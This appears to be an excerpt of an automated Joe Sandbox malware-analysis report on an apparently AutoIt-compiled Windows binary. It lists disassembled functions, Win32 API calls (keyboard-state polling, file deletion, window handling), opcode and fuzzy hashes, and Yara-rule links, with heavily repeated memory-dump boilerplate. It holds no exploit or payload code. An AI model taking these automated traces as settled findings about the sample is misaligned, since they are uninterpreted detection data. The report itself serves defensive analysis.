                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                                                        • Opcode ID: 9cc51fcab7b188cafa7fb9c18dd6cd4630f66ee2b1fff143a7473c64cf8ca281
                                                                                                                                                        • Instruction ID: 81a9eb2ce843a572122a4d8c78cc3da26f205848cc7d9217377255503f31d5a5
                                                                                                                                                        • Opcode Fuzzy Hash: 9cc51fcab7b188cafa7fb9c18dd6cd4630f66ee2b1fff143a7473c64cf8ca281
                                                                                                                                                        • Instruction Fuzzy Hash: B541913610024A8FCF08EF94D941BFA33A1BF2A390F1448A4FD515B295DB34DE2ADB60
                                                                                                                                                        Function 00AD83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AD843F
                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AD8455
                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD8466
                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AD8478
                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AD8489
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: SendString$_memmove
                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                                                        • Opcode ID: 95ebca3d4d7e4a3bbd0b953ceb88ff34e09664582731cb893748803de3051b0d
                                                                                                                                                        • Instruction ID: cd764edfa8497d3390b3e14e0bd3d1915423e1e98cf1413887df6dc20da8900e
                                                                                                                                                        • Opcode Fuzzy Hash: 95ebca3d4d7e4a3bbd0b953ceb88ff34e09664582731cb893748803de3051b0d
                                                                                                                                                        • Instruction Fuzzy Hash: 181194A1B5015979DB20A7A1DC4ADFF7BFCEF91F00F48046AB412A21D1DEA05F44C6B1
                                                                                                                                                        Function 00AD8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM ref: 00AD809C
                                                                                                                                                          • Part of subcall function 00AAE3A5: timeGetTime.WINMM(?,7608B400,00B06163), ref: 00AAE3A9
                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00AD80C8
                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00AD80EC
                                                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AD810E
                                                                                                                                                        • SetActiveWindow.USER32 ref: 00AD812D
                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AD813B
                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AD815A
                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00AD8165
                                                                                                                                                        • IsWindow.USER32 ref: 00AD8171
                                                                                                                                                        • EndDialog.USER32(00000000), ref: 00AD8182
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                        • Opcode ID: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                                                                                                                                                        • Instruction ID: d186450afa2af3599369ab978ba659f2cd0e6d6af900476ff2265f6ad2a2e084
                                                                                                                                                        • Opcode Fuzzy Hash: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                                                                                                                                                        • Instruction Fuzzy Hash: E721A170200305BFE7225B22EC89B763BAAF718BCAB444256F50283361CF764E099611
                                                                                                                                                        Function 00AD32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B03C64,00000010,00000000,Bad directive syntax error,00B2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00AD32D1
                                                                                                                                                        • LoadStringW.USER32(00000000,?,00B03C64,00000010), ref: 00AD32D8
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • _wprintf.LIBCMT ref: 00AD3309
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AD332B
                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AD3395
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                        • API String ID: 1506413516-4153970271
                                                                                                                                                        • Opcode ID: 6f97596e4f86cf303de41b82fd3549a8ead3f45b3b30dcab9e1e06aeb3f737d5
                                                                                                                                                        • Instruction ID: 61a47173e078c4005113035a9d2fecb1c52345f8c2aa1b70a38a889bb8ea060f
                                                                                                                                                        • Opcode Fuzzy Hash: 6f97596e4f86cf303de41b82fd3549a8ead3f45b3b30dcab9e1e06aeb3f737d5
                                                                                                                                                        • Instruction Fuzzy Hash: A9215132940219BBCF11EF90CD0AFEE77B9BF14700F044456F516A60A2DA75AB54DB51
                                                                                                                                                        Function 00ADC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ADC6A0: __time64.LIBCMT ref: 00ADC6AA
                                                                                                                                                          • Part of subcall function 00A941A7: _fseek.LIBCMT ref: 00A941BF
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00ADC96F
                                                                                                                                                          • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00ADC982
                                                                                                                                                        • _wcscat.LIBCMT ref: 00ADC995
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00ADC9BA
                                                                                                                                                        • _wcscat.LIBCMT ref: 00ADC9D0
                                                                                                                                                        • _wcscat.LIBCMT ref: 00ADC9E3
                                                                                                                                                          • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC71D
                                                                                                                                                          • Part of subcall function 00ADC6E4: _memmove.LIBCMT ref: 00ADC72C
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADC92A
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF49
                                                                                                                                                          • Part of subcall function 00ADCE59: _wcscmp.LIBCMT ref: 00ADCF5C
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ADCB8D
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC24
                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ADCC3A
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC4B
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ADCC5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 152968663-0
                                                                                                                                                        • Opcode ID: 0fc6b8c6db1cc19fc8b45d318bf65663a6e2c8c5555e06d388ae8356fe3363e2
                                                                                                                                                        • Instruction ID: 1e75282781049a24de0ec1ed4eaaf98ec508ebbb2d04b3c2e4c461187aa3c42f
                                                                                                                                                        • Opcode Fuzzy Hash: 0fc6b8c6db1cc19fc8b45d318bf65663a6e2c8c5555e06d388ae8356fe3363e2
                                                                                                                                                        • Instruction Fuzzy Hash: BCC13DB1A00129AECF10DFA5CD81EDEB7BDEF49310F5041AAF609E6251DB709A85CF61
                                                                                                                                                        Function 00AE08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3566271842-0
                                                                                                                                                        • Opcode ID: 38f3f8a342483952efec80b81d1b1ff8ce3a13a8f0777eda142c58d74d865bfd
                                                                                                                                                        • Instruction ID: a7c406b7cc63a7b8252ae11aaa4cd71e0daa145d3ad6685034346d49f663c653
                                                                                                                                                        • Opcode Fuzzy Hash: 38f3f8a342483952efec80b81d1b1ff8ce3a13a8f0777eda142c58d74d865bfd
                                                                                                                                                        • Instruction Fuzzy Hash: 3C711D75A00219AFDB10DFA5C984EDEB7B9FF48350F048495E919AB252DB74EE40CF90
                                                                                                                                                        Function 00AD388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD3908
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00AD3973
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00AD3993
                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00AD39AA
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00AD39D9
                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00AD39EA
                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00AD3A16
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00AD3A24
                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00AD3A4D
                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00AD3A5B
                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00AD3A84
                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00AD3A92
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                        • Opcode ID: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                                                                                                                                                        • Instruction ID: 3c3fdd19e3ae88a012e303b87e51ce094378375a641af77879ef4fe13904e072
                                                                                                                                                        • Opcode Fuzzy Hash: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                                                                                                                                                        • Instruction Fuzzy Hash: 8051B562A0478429FF35EBA489117EEBBB45F01380F48859BD5C3562C2DAA49B8CC763
                                                                                                                                                        Function 00ACFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00ACFB19
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ACFB2B
                                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ACFB89
                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00ACFB94
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ACFBA6
                                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ACFBFC
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00ACFC0A
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ACFC1B
                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ACFC5E
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00ACFC6C
                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ACFC89
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00ACFC96
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                        • Opcode ID: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                                                                                                                                                        • Instruction ID: 6fcf69bc7bd0e0dd8f97ca67333c733cd485e2b07de5f74ec0e9661f49b631ec
                                                                                                                                                        • Opcode Fuzzy Hash: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
                                                                                                                                                        • Instruction Fuzzy Hash: 2851FE71B00209AFDB18CF69DD95FAEBBBAEB88710F55813DB919D7294DB709D008B10
                                                                                                                                                        Function 00AAB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00AAB067
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                        • Opcode ID: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                                                                                                                                                        • Instruction ID: a485e3a5f886ef23ec1acc4990d8f4fb4ead4cabeb5d046483aef30a7bf4c493
                                                                                                                                                        • Opcode Fuzzy Hash: b4f4b6bf40a6c56e0b7f231c3bdee06a772b0bcddab49e1727c32cc87fd19141
                                                                                                                                                        • Instruction Fuzzy Hash: 34418B31110540EFDB209F28D888BBA3BA6EB06721F5883A5FD759B1E6DB318C51DB31
                                                                                                                                                        Function 00AD7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
